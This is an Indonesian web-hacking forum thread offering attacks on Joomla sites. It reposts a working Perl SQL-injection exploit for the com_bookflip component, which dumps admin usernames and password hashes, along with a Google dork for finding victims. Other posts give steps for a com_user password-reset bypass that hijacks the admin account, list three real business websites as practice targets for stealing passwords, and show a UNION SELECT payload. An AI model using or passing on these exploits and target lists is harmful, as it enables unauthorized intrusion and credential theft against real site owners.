joomla hack

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
j.gladiator
Posts: 35
Joined: Sat Dec 27, 2008 1:19 pm
Location: long island

Re: joomla hack

Post by j.gladiator » Wed Jul 01, 2009 4:07 pm

meski q lum nyoba tapi... q cuma pengen share disini.... (sumber : milw0rm)

#!/usr/bin/perl -w

#Joomla com_bookflip(book_id) Sql injection#
########################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan
#---------------------------------------
#[!] <name>BookFlip</name>
#[!] <creationDate>Juin 2008</creationDate>
#[!] <author>FCI F-Cimag-In</author>
#[!] <copyright>Ce composant est distribué gratuitement.</copyright>
#[!] <authorEmail>[email protected]</authorEmail>
#[!] <authorUrl>www.f-cimag-in.com</authorUrl>
#[!] <version>2.1</version>
#---------------------------------------
#[!] Google_Dork: inurl:"com_bookflip"
########################################

system("color FF0000");
print "\t ###############################################################\n\n";
print "\t # Kosova Hackers Group (KHG-CREW) #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n";
print "\t # - R.I.P redc00de #\n\n";
print "\t # - Cod3d by boom3rang #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-9999+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
}
else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
}

########################
# - Proud 2 be Albanian
# - Proud 2 be Muslim
########################

# milw0rm.com [2009-06-29]
^nothing specials 4 my self^
hidup penuh dengan warna
=====================================================================
-live-is-short-
Top
User avatar
zarskycrew
Posts: 16
Joined: Wed Apr 01, 2009 4:51 pm
Contact:
Contact zarskycrew

Re: joomla hack

Post by zarskycrew » Sat Jul 04, 2009 12:13 am

j.gladiator wrote:pertama masuk k google.com
ke2 masukin ini
inurl:option=com_user
lanjut..
target:
contohnya : >>>>>http://situstarget.com/index.php?option ... view=reset<<<<<
di rubah jd
>>>>>http://situstarget.com/index.php?option ... ut=confirm<<<<<<
setelah itu akan munjul token
isi dengan ' <----------- mengapa harus tanda ---------->'
dah coba ajah yaw..
dah setelah itu akan muncul password dan very password
isi dengan sesuka hati
setelah itu login
dengan username Admin password nya yang td km isi
setelah itu
admin udah jd milik kau...
selesai.....

klo dah reset password, pas coba login gagal mulu ..
apa username nya salah gt ya ?
cara nya cari username nya gmn ya ??
Top
User avatar
Quick_5ilv3r
Posts: 6
Joined: Sun Mar 29, 2009 7:34 pm
Location: Local Disck X
Contact:
Contact Quick_5ilv3r

Re: joomla hack

Post by Quick_5ilv3r » Sat Jul 04, 2009 9:02 pm

keren mas tapi dah lawas.. :D
Image
Top
mahaja
Posts: 2
Joined: Wed May 07, 2008 3:12 pm

Re: joomla hack

Post by mahaja » Wed Jul 15, 2009 1:16 pm

yup....

caranya seh bener ....

tapi thu dah lama mas...

tapi ya gpp lah kita saling share j...
tetep bereksperimen...
Top
User avatar
vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem
Contact:
Contact vodork

Re: joomla hack

Post by vodork » Mon Jul 20, 2009 9:45 am

wew nice too :D :D
tapi udah lama jugga tuh :roll: :roll:
lanjut cari yang baru :twisted: :twisted:

lock
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.
Top
User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:
Contact shad.hckr

Re: joomla hack

Post by shad.hckr » Mon Jul 20, 2009 11:50 am

site: Joomla
dork: com_category
method: SQLi
credits: milw0rm

Code: Select all

http://www.epsau.com.au/index.php?option=com_category&task=loadCategory&catid=12

http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=11

http://www.hgau.com.au/index.php?option=com_category&task=loadCategory&catid=131
ada target nih.. bisa dapet password juga.. sekalian praktek SQLi ya..
ni Joomla tapi manfaatin celah SQL. kalo belum tau caranya tinggal search di forum ini ya kk..
Top
Sniffer_Vandal
Posts: 8
Joined: Tue Jan 13, 2009 11:44 am

Re: joomla hack

Post by Sniffer_Vandal » Sun Aug 23, 2009 8:49 pm

Seru-Seru Lanjut" Q pengen belajar SQL injc
Uwh dimana yw belajarnya...?
Biar cepat Belajarnya...?
uwh pengen bisa SQL Inject...
hehehehehehe....
JANGAN BILANG DIRI ANDA LEBIH PINTAR...
KARENA DI LUAR SANA MASIH BANYAK YANG LEBIH PINTAR DARI KITA....
Top
User avatar
.::Z10R::.
Posts: 34
Joined: Wed Jul 16, 2008 3:23 pm

Re: joomla hack

Post by .::Z10R::. » Mon Aug 24, 2009 12:42 pm

Sniffer_Vandal wrote:Seru-Seru Lanjut" Q pengen belajar SQL injc
Uwh dimana yw belajarnya...?
Biar cepat Belajarnya...?
uwh pengen bisa SQL Inject...
hehehehehehe....
pengen belajar kok mo instan :)
Mencoba Pensiun dari game Online
Top
Sniffer_Vandal
Posts: 8
Joined: Tue Jan 13, 2009 11:44 am

Re: joomla hack

Post by Sniffer_Vandal » Mon Oct 19, 2009 8:11 pm

.::Z10R::. wrote:
Sniffer_Vandal wrote:Seru-Seru Lanjut" Q pengen belajar SQL injc
Uwh dimana yw belajarnya...?
Biar cepat Belajarnya...?
uwh pengen bisa SQL Inject...
hehehehehehe....
pengen belajar kok mo instan :)
Emangnya MIE instan...?
hahahahahahahahahaha.....

Nice brow just kidding...!!!
kita belajar pelan2...
we baru cuma bisa nampilin version aja
setelah nampilin versionnya gmana yw...?

contoh : index.php?id=-100+union+all+select 1,2,@@version,4--

nach setelah itu apa lagi...?
ada yang bisa bantu gak?
JANGAN BILANG DIRI ANDA LEBIH PINTAR...
KARENA DI LUAR SANA MASIH BANYAK YANG LEBIH PINTAR DARI KITA....
Top
blackxnovo
Posts: 20
Joined: Fri Jan 15, 2010 2:43 am
Location: anywhere

Re: joomla hack

Post by blackxnovo » Fri Jan 15, 2010 8:47 am

pusing!
gak jelas penjelasanx!
mas... tlg diperjelas dong.
makasih sebelumx.
Jong Ambonese
Top
Post Reply

Return to “Web Hacking”